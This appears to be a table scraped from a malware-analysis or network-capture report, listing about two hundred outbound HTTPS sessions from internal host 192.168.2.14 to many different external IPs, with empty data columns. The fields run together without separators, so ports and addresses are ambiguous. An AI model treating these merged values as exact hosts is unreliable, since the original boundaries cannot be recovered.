                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14156192.168.2.143445441.47.108.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14157192.168.2.1446262186.219.223.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14158192.168.2.143473057.21.4.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14159192.168.2.1442890192.35.66.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14160192.168.2.1460776161.249.44.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14161192.168.2.1434346160.44.71.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14162192.168.2.144766496.72.85.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14163192.168.2.1458462199.107.216.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14164192.168.2.1448782134.182.50.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14165192.168.2.1442940102.237.214.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14166192.168.2.1448576165.29.203.13443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14167192.168.2.1459690160.109.7.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14168192.168.2.145900057.224.59.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14169192.168.2.1435770124.123.117.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14170192.168.2.145701078.111.183.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14171192.168.2.144050291.1.62.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14172192.168.2.1435776179.99.175.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14173192.168.2.1447016189.115.55.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14174192.168.2.1442090107.151.23.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14175192.168.2.1443480130.106.101.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14176192.168.2.14585001.124.120.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14177192.168.2.1452410124.203.193.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14178192.168.2.145492891.114.164.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14179192.168.2.144813847.53.18.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14180192.168.2.1456588181.119.204.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14181192.168.2.1450400111.4.145.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14182192.168.2.1433312161.139.184.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14183192.168.2.144984259.180.176.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14184192.168.2.1445394140.178.221.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14185192.168.2.143503099.25.246.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14186192.168.2.1443436186.96.36.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14187192.168.2.1433430126.41.252.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14188192.168.2.143725088.3.90.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14189192.168.2.145304461.10.148.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14190192.168.2.143928849.2.86.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14191192.168.2.1459176130.247.211.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192192.168.2.1449538165.44.21.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14193192.168.2.1452046119.65.60.119443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14194192.168.2.1440246187.240.66.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14195192.168.2.1434480185.77.57.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14196192.168.2.1460616209.226.232.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14197192.168.2.1436952115.76.59.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14198192.168.2.145777884.21.148.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14199192.168.2.1452724147.80.110.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14200192.168.2.144837873.236.92.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14201192.168.2.1442456186.174.9.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14202192.168.2.1439098104.154.144.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14203192.168.2.144897890.249.182.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14204192.168.2.143412054.36.224.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14205192.168.2.143758817.224.191.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14206192.168.2.1440566213.196.215.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14207192.168.2.1448232106.208.205.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14208192.168.2.1456552115.122.124.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14209192.168.2.145937691.116.11.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14210192.168.2.14480269.70.216.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14211192.168.2.1436522221.143.192.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14212192.168.2.143753674.247.65.211443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14213192.168.2.1442650121.187.151.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14214192.168.2.144624437.57.86.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14215192.168.2.1433924125.29.11.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14216192.168.2.1441074206.207.159.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14217192.168.2.145172079.13.217.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14218192.168.2.144090638.100.127.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14219192.168.2.143355094.192.177.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14220192.168.2.1442066221.80.172.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14221192.168.2.143609031.33.100.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14222192.168.2.1435270207.117.206.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14223192.168.2.143987486.101.247.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14224192.168.2.144278257.42.42.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14225192.168.2.145215870.1.166.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14226192.168.2.1449030125.66.181.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14227192.168.2.145638014.34.214.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14228192.168.2.143461639.142.42.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14229192.168.2.1448076151.129.114.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14230192.168.2.1452644155.176.188.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14231192.168.2.1456528173.101.70.96443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14232192.168.2.144673857.188.209.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14233192.168.2.1444956115.180.194.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14234192.168.2.144943474.79.172.71443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14235192.168.2.1437422100.152.33.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14236192.168.2.1442710185.194.83.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14237192.168.2.145501871.220.90.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14238192.168.2.144210857.86.101.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14239192.168.2.144011043.228.3.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14240192.168.2.1440714221.245.213.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14241192.168.2.145589219.102.248.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14242192.168.2.1452906193.19.17.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14243192.168.2.1452300144.95.153.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14244192.168.2.145982417.157.211.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14245192.168.2.145524446.120.209.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14246192.168.2.144321678.212.52.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14247192.168.2.1456940187.180.70.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14248192.168.2.1441562192.73.170.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14249192.168.2.145762474.171.114.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14250192.168.2.1458664111.25.173.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14251192.168.2.1450738148.191.113.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14252192.168.2.1455228220.166.139.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14253192.168.2.143482284.15.91.247443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14254192.168.2.145893217.130.6.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14255192.168.2.145397218.46.75.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14256192.168.2.1460080191.6.101.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14257192.168.2.143403840.45.87.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14258192.168.2.1438366160.225.213.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14259192.168.2.14353225.118.40.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14260192.168.2.14443044.24.132.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14261192.168.2.144824018.253.62.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14262192.168.2.145568843.240.210.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14263192.168.2.143994658.204.97.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14264192.168.2.143840478.147.20.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14265192.168.2.144768652.111.35.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14266192.168.2.145018012.255.198.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14267192.168.2.144979672.135.179.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14268192.168.2.1460356137.34.47.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14269192.168.2.1434466182.116.26.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14270192.168.2.1448560108.15.7.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14271192.168.2.1457148113.194.223.196443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14272192.168.2.1455672131.131.12.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14273192.168.2.1455092216.41.1.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14274192.168.2.146031214.102.165.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14275192.168.2.144448487.105.72.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14276192.168.2.144740896.75.18.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14277192.168.2.144520053.235.135.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14278192.168.2.144870099.27.254.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14279192.168.2.1449818130.244.155.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14280192.168.2.1439202175.137.248.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14281192.168.2.1444682156.161.241.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14282192.168.2.1436318165.99.246.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14283192.168.2.143600463.41.254.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14284192.168.2.145965657.16.26.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14285192.168.2.143610835.152.229.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14286192.168.2.1453666110.157.34.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14287192.168.2.1455736160.62.230.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14288192.168.2.1442280186.20.15.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14289192.168.2.144731453.77.119.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14290192.168.2.144876649.145.206.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14291192.168.2.145742013.228.33.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14292192.168.2.144657448.240.33.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14293192.168.2.144324899.168.118.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14294192.168.2.144353863.74.146.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14295192.168.2.14392149.198.225.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14296192.168.2.1437314189.158.91.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14297192.168.2.1441436212.24.88.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14298192.168.2.1437736149.255.12.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14299192.168.2.146088098.84.51.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14300192.168.2.1454574164.181.73.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14301192.168.2.144524257.233.87.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14302192.168.2.1456660151.160.104.11443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14303192.168.2.145448880.88.101.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14304192.168.2.1438430102.13.174.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14305192.168.2.145084024.32.254.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14306192.168.2.1436396201.223.180.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14307192.168.2.1449394178.11.2.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14308192.168.2.1433416129.182.157.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14309192.168.2.1446464108.195.184.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14310192.168.2.1456904212.78.66.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14311192.168.2.1457514103.140.155.106443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14312192.168.2.1441692213.15.82.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14313192.168.2.144084040.244.106.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14314192.168.2.1445204152.7.129.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14315192.168.2.1459208133.81.104.195443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14316192.168.2.1457412117.121.12.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14317192.168.2.1460390184.56.15.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14318192.168.2.1443272143.136.87.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14319192.168.2.1435462205.60.81.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14320192.168.2.144275631.64.60.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14321192.168.2.144216680.27.164.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14322192.168.2.145159477.84.214.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14323192.168.2.144864841.242.190.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14324192.168.2.144033435.174.117.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14325192.168.2.144530251.95.238.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14326192.168.2.1435224156.91.73.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14327192.168.2.1442222161.223.198.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14328192.168.2.1445412156.196.205.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14329192.168.2.145444271.133.133.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14330192.168.2.143527660.206.31.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14331192.168.2.1460542154.55.131.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14332192.168.2.1437876222.171.53.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14333192.168.2.145368225.135.235.208443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14334192.168.2.1439116195.29.163.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14335192.168.2.1433102216.103.150.128443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14336192.168.2.144197460.231.158.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14337192.168.2.1459048113.140.252.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14338192.168.2.145653847.149.163.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14339192.168.2.143400071.67.94.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14340192.168.2.1438008111.197.194.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14341192.168.2.144233637.121.37.124443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14342192.168.2.1438004110.113.247.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14343192.168.2.144918436.167.240.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14344192.168.2.144626627.138.176.222443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14345192.168.2.1433680111.103.204.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14346192.168.2.143756084.193.120.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14347192.168.2.1432860176.138.17.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14348192.168.2.144782218.88.49.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14349192.168.2.143642635.254.92.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14350192.168.2.1440514212.170.187.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14351192.168.2.144101636.52.13.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14352192.168.2.1454488197.193.193.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14353192.168.2.1451444217.63.242.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14354192.168.2.145017843.85.97.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14355192.168.2.1444812191.92.213.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14356192.168.2.143418499.55.241.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14357192.168.2.145177262.152.147.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14358192.168.2.1450144144.233.241.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14359192.168.2.144424889.250.101.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14360192.168.2.145172617.247.219.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14361192.168.2.1435742164.60.214.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14362192.168.2.144525860.6.210.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14363192.168.2.1441564113.181.214.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14364192.168.2.1459570105.110.70.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14365192.168.2.144365679.106.36.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14366192.168.2.143504617.93.91.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14367192.168.2.1460266192.84.135.79443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
